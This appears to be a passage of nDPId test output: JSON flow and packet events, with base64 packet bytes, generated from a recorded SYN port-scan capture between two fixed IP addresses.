-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAszmMAADAGSg+sEAAIQA2GNIzTBFLdU4MZAAAAAGACBAAwOgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3kAADcGYfmsEAAIQA2GNIzTCGDdU4MZAAAAAGACEAAgLAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsoj0AACUGgTWsEAAIQA2GNIzTF0jdU4MZAAAAAGACCAAZRAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsj+cAACkGj4usEAAIQA2GNIzTBHLdU4MZAAAAAGACCAAsGgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4YAADsG3eysEAAIQA2GNIzTB\/rdU4MZAAAAAGACEAAgkgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsgXEAACcGoAGsEAAIQA2GNIzTABPdU4MZAAAAAGACEAAoeQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAscfMAADcGn3+sEAAIQA2GNIzTOpjdU4MZAAAAAGACEADt8wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqgAADcG0sqsEAAIQA2GNIzTBEPdU4MZAAAAAGACEAAkSQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs3asAACwGPsesEAAIQA2GNIzTE+zdU4MZAAAAAGACBAAgoAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0oAADsGRiisEAAIQA2GNIzTAgzdU4MZAAAAAGACEAAmgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAst5EAADAGYOGsEAAIQA2GNIzSBPjdUoMYAAAAAGACBAAvlwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsk4oAADEGg+isEAAIQA2GNIzSIsPdUoMYAAAAAGACCAANzAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBsAACwG6FesEAAIQA2GNIzSBGHdUoMYAAAAAGACBAAwLgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0AAACYG3zKsEAAIQA2GNIzSJyjdUoMYAAAAAGACDAAFZwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsch0AADoGnFWsEAAIQA2GNIzSF3PdUoMYAAAAAGACDAAVHAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdEAACcGo6GsEAAIQA2GNIzSH5jdUoMYAAAAAGACEAAI9wAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs808AADYGHyOsEAAIQA2GNIzSoifdUoMYAAAAAGACDACKZwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsApcAACsGGtysEAAIQA2GNIzSFLLdUoMYAAAAAGACEAAT3QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsVuIAADgGuZCsEAAIQA2GNIzSBrXdUoMYAAAAAGACBAAt2gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsSbwAADoGxLasEAAIQA2GNIzSACvdUoMYAAAAAGACDAAsZAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs1IAAACkGSvKsEAAIQA2GNIzSBGLdUoMYAAAAAGACCAAsLQAAAgQFtA=="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":2,"flow_last_seen":1278275060352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275060352,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABGjNKWQmY93VKDGVAUAABTcgAAAAAAAAAA"} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs6tAAADUGKKKsEAAIQA2GNIzSAsfdUoMYAAAAAGACCAAtyAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NEAACcGMKGsEAAIQA2GNIzSgAHdUoMYAAAAAGACEACojQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsldQAADsGd56sEAAIQA2GNIzTDLzdU4MZAAAAAGACEAAb0AAAAgQFtA=="} 
